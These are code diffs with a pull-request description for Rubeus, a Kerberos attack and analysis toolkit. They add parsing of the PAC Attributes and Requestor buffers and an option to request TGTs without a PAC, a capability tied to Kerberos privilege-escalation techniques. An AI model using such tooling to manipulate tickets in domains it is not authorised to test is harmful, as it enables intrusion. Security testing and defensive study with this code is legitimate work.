             PASSWORD_EXPIRED = 8388608,
             TRUSTED_TO_AUTH_FOR_DELEGATION = 16777216,
+            NO_AUTH_DATA_REQUIRED = 33554432,
             PARTIAL_SECRETS_ACCOUNT = 67108864
         }
 

--- a/Rubeus/lib/Interop.cs
+++ b/Rubeus/lib/Interop.cs
@@ -702,6 +702,15 @@ namespace Rubeus
             RESOURCE_GROUPS = 512
         }
 
+        // from https://download.samba.org/pub/samba/patches/security/samba-4.15.1-security-2021-11-09.patch
+        [Flags]
+        public enum PacAttribute : Int32
+        {
+            PAC_NOT_REQUESTED = 0x00000000,
+            PAC_WAS_REQUESTED = 0x00000001,
+            PAC_WAS_GIVEN_IMPLICITLY = 0x00000002
+        }
+
         [Flags]
         public enum LDAPUserAccountControl : Int32
         {

--- a/Rubeus/lib/LSA.cs
+++ b/Rubeus/lib/LSA.cs
@@ -835,7 +835,8 @@ namespace Rubeus
                         else if (pacInfoBuffer is Attributes att)
                         {
                             Console.WriteLine("{0}  Attributes             :", indent);
-                            Console.WriteLine("{0}    Attributes           : {1}", indent, Helpers.ByteArrayToString(att.attrib));
+                            Console.WriteLine("{0}    AttributeLength      : {1}", indent, att.Length);
+                            Console.WriteLine("{0}    AttributeFlags       : ({1}) {2}", indent, (int)att.Flags, att.Flags);
                         }
                     }
                 }

--- a/Rubeus/lib/LSA.cs
+++ b/Rubeus/lib/LSA.cs
@@ -827,7 +827,16 @@ namespace Rubeus
                             Console.WriteLine("{0}    TransitedListSize    : {1}", indent, s4u.s4u.TransitedListSize);
                             Console.WriteLine("{0}    S4UTransitedServices : {1}", indent, s4u.s4u.S4UTransitedServices.GetValue().Select(s => s.ToString()).Aggregate((cur, next) => cur + " <= " + next));
                         }
-
+                        else if (pacInfoBuffer is Requestor requestor)
+                        {
+                            Console.WriteLine("{0}  Requestor              :", indent);
+                            Console.WriteLine("{0}    RequestorSID         : {1}", indent, requestor.RequestorSID.ToString());
+                        }
+                        else if (pacInfoBuffer is Attributes att)
+                        {
+                            Console.WriteLine("{0}  Attributes             :", indent);
+                            Console.WriteLine("{0}    Attributes           : {1}", indent, Helpers.ByteArrayToString(att.attrib));
+                        }
                     }
                 }
                 catch

--- a/Rubeus/lib/krb_structures/AS_REQ.cs
+++ b/Rubeus/lib/krb_structures/AS_REQ.cs
@@ -64,13 +64,13 @@ namespace Rubeus
             return req;
         }
 
-        public static AS_REQ NewASReq(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, bool opsec = false, bool changepw = false )
+        public static AS_REQ NewASReq(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, bool opsec = false, bool changepw = false, bool pac = true)
         {
             // build a new AS-REQ for the given userName, domain, and etype, w/ PA-ENC-TIMESTAMP
             //  used for "legit" AS-REQs w/ pre-auth
 
             // set pre-auth
-            AS_REQ req = new AS_REQ(keyString, etype, opsec);
+            AS_REQ req = new AS_REQ(keyString, etype, opsec, pac);
             
             // req.padata.Add()
 
@@ -157,7 +157,7 @@ namespace Rubeus
             req_body = new KDCReqBody(true, opsec);
         }
 
-        public AS_REQ(string keyString, Interop.KERB_ETYPE etype, bool opsec = false)
+        public AS_REQ(string keyString, Interop.KERB_ETYPE etype, bool opsec = false, bool pac = true)
         {
             // default, for creation
             pvno = 5;
@@ -169,7 +169,7 @@ namespace Rubeus
             padata.Add(new PA_DATA(keyString, etype));
 
             // add the include-pac == true
-            padata.Add(new PA_DATA());
+            padata.Add(new PA_DATA(pac));
             
             req_body = new KDCReqBody(true, opsec);
 

--- a/Rubeus/lib/krb_structures/KERB_PA_PAC_REQUEST.cs
+++ b/Rubeus/lib/krb_structures/KERB_PA_PAC_REQUEST.cs
@@ -11,10 +11,10 @@ namespace Rubeus
 
     public class KERB_PA_PAC_REQUEST
     {
-        public KERB_PA_PAC_REQUEST()
+        public KERB_PA_PAC_REQUEST(bool pac = true)
         {
             // default -> include PAC
-            include_pac = true;
+            include_pac = pac;
         }
 
         public KERB_PA_PAC_REQUEST(AsnElt value)

--- a/Rubeus/lib/krb_structures/PA_DATA.cs
+++ b/Rubeus/lib/krb_structures/PA_DATA.cs
@@ -15,12 +15,12 @@ namespace Rubeus {
         //        padata-value    [2] OCTET STRING -- might be encoded AP-REQ
         //}
 
-        public PA_DATA()
+        public PA_DATA(bool pac = true)
         {
             // defaults for creation
             type = Interop.PADATA_TYPE.PA_PAC_REQUEST;
 
-            value = new KERB_PA_PAC_REQUEST();
+            value = new KERB_PA_PAC_REQUEST(pac);
         }
 
         public PA_DATA(bool claims, bool branch, bool fullDC, bool rbcd)

--- a/Rubeus/lib/krb_structures/TGS_REQ.cs
+++ b/Rubeus/lib/krb_structures/TGS_REQ.cs
@@ -178,8 +178,6 @@ namespace Rubeus
                 {
                     req.req_body.kdcOptions = req.req_body.kdcOptions | Interop.KdcOptions.CONSTRAINED_DELEGATION | Interop.KdcOptions.CANONICALIZE;
                     req.req_body.kdcOptions = req.req_body.kdcOptions & ~Interop.KdcOptions.RENEWABLEOK;
-                    PA_DATA pac_options = new PA_DATA(false, false, false, true);
-                    req.padata.Add(pac_options);
                 }
             }
 
@@ -268,6 +266,11 @@ namespace Rubeus
             {
                 PA_DATA padataoptions = new PA_DATA(false, true, false, false);
                 req.padata.Add(padataoptions);
+            }
+            else if ((tgs != null) && !u2u)
+            {
+                PA_DATA pac_options = new PA_DATA(false, false, false, true);
+                req.padata.Add(pac_options);
             }
 
             return req.Encode().Encode();

--- a/Rubeus/lib/krb_structures/pac/Attributes.cs
+++ b/Rubeus/lib/krb_structures/pac/Attributes.cs
@@ -1,0 +1,37 @@
+﻿using System;
+
+namespace Rubeus.Kerberos.PAC
+{
+    public class Attributes : PacInfoBuffer
+    {
+        
+        public byte[] attrib { get; set; }
+
+        public Attributes(PacInfoBufferType type)
+        {
+            this.Type = type;
+        }
+
+        public Attributes()
+        {
+            Type = PacInfoBufferType.Attributes;
+            byte[] data = { 0x2, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0 };
+            Decode(data);
+        }
+
+        public Attributes(byte[] data) : base(data, PacInfoBufferType.Attributes)
+        {
+            Decode(data);
+        }
+
+        public override byte[] Encode()
+        {
+            return attrib;
+        }
+
+        protected override void Decode(byte[] data)
+        {
+            attrib = data;
+        }
+    }
+}

--- a/Rubeus/lib/krb_structures/pac/Attributes.cs
+++ b/Rubeus/lib/krb_structures/pac/Attributes.cs
@@ -1,11 +1,14 @@
 ﻿using System;
+using System.IO;
 
 namespace Rubeus.Kerberos.PAC
 {
     public class Attributes : PacInfoBuffer
     {
         
-        public byte[] attrib { get; set; }
+        public uint Length { get; set; }
+
+        public Interop.PacAttribute Flags { get; set; }
 
         public Attributes(PacInfoBufferType type)
         {
@@ -15,8 +18,8 @@ namespace Rubeus.Kerberos.PAC
         public Attributes()
         {
             Type = PacInfoBufferType.Attributes;
-            byte[] data = { 0x2, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0 };
-            Decode(data);
+            Length = 2; // always going to be 2?
+            Flags = Interop.PacAttribute.PAC_WAS_REQUESTED;
         }
 
         public Attributes(byte[] data) : base(data, PacInfoBufferType.Attributes)
@@ -26,12 +29,16 @@ namespace Rubeus.Kerberos.PAC
 
         public override byte[] Encode()
         {
-            return attrib;
+            BinaryWriter bw = new BinaryWriter(new MemoryStream());
+            bw.Write(Length);
+            bw.Write((int)Flags);
+            return ((MemoryStream)bw.BaseStream).ToArray();
         }
 
         protected override void Decode(byte[] data)
         {
-            attrib = data;
+            Length = br.ReadUInt32();
+            Flags = (Interop.PacAttribute)br.ReadInt32();
         }
     }
 }

--- a/Rubeus/lib/krb_structures/pac/PACTYPE.cs
+++ b/Rubeus/lib/krb_structures/pac/PACTYPE.cs
@@ -58,6 +58,12 @@ namespace Rubeus.Kerberos {
                     case PacInfoBufferType.S4U2Proxy:
                         PacInfoBuffers.Add(new S4UDelegationInfo(pacData));
                         break;
+                    case PacInfoBufferType.Attributes:
+                        PacInfoBuffers.Add(new Attributes(pacData));
+                        break;
+                    case PacInfoBufferType.Requestor:
+                        PacInfoBuffers.Add(new Requestor(pacData));
+                        break;
                 }                             
             }
         }

--- a/Rubeus/lib/krb_structures/pac/PacInfoBuffer.cs
+++ b/Rubeus/lib/krb_structures/pac/PacInfoBuffer.cs
@@ -17,7 +17,9 @@ namespace Rubeus.Kerberos.PAC {
         ClientClaims = 0xd,
         DeviceInfo = 0xe,
         DeviceClaims = 0xf,
-        TicketChecksum = 0x10
+        TicketChecksum = 0x10,
+        Attributes = 0x11,
+        Requestor = 0x12
     }
 
     public abstract class PacInfoBuffer {

--- a/Rubeus/lib/krb_structures/pac/Requestor.cs
+++ b/Rubeus/lib/krb_structures/pac/Requestor.cs
@@ -1,0 +1,44 @@
+﻿using System.Security.Principal;
+
+namespace Rubeus.Kerberos.PAC
+{
+    public class Requestor : PacInfoBuffer
+    {
+
+        public SecurityIdentifier RequestorSID { get; set; }
+
+        public Requestor(PacInfoBufferType type)
+        {
+            this.Type = type;
+        }
+
+        public Requestor(SecurityIdentifier sid)
+        {
+            Type = PacInfoBufferType.Requestor;
+            RequestorSID = sid;
+        }
+
+        public Requestor(string sid)
+        {
+            Type = PacInfoBufferType.Requestor;
+            RequestorSID = new SecurityIdentifier(sid);
+        }
+
+        public Requestor(byte[] data) : base(data, PacInfoBufferType.Requestor)
+        {
+            Decode(data);
+        }
+
+        public override byte[] Encode()
+        {
+            byte[] binarySid = new byte[RequestorSID.BinaryLength];
+            RequestorSID.GetBinaryForm(binarySid, 0);
+            return binarySid;
+        }
+
+        protected override void Decode(byte[] data)
+        {
+            RequestorSID = new SecurityIdentifier(data, 0);
+        }
+    }
+}

--- a/Rubeus/lib/krb_structures/pac/SignatureData.cs
+++ b/Rubeus/lib/krb_structures/pac/SignatureData.cs
@@ -37,6 +37,7 @@ namespace Rubeus.Kerberos.PAC {
                     break;
                 case Interop.KERB_CHECKSUM_ALGORITHM.KERB_CHECKSUM_HMAC_SHA1_96_AES128:
                 case Interop.KERB_CHECKSUM_ALGORITHM.KERB_CHECKSUM_HMAC_SHA1_96_AES256:
+                case Interop.KERB_CHECKSUM_ALGORITHM.KERB_CHECKSUM_NONE:
                     Signature = br.ReadBytes(12);
                     break;
             }


### PR DESCRIPTION
… initial TGTs without a PAC

New PAC_INFO_BUFFERs are now parsed and output by `describe`:
```
    Attributes             :
      Attributes           : 0200000001000000
    Requestor              :
      RequestorSID         : S-1-5-21-652637156-682571310-46925969-1103
```
The `Attributes` section seems to be a static value for now so not sure exactly how to parse it properly, the raw bytes are output.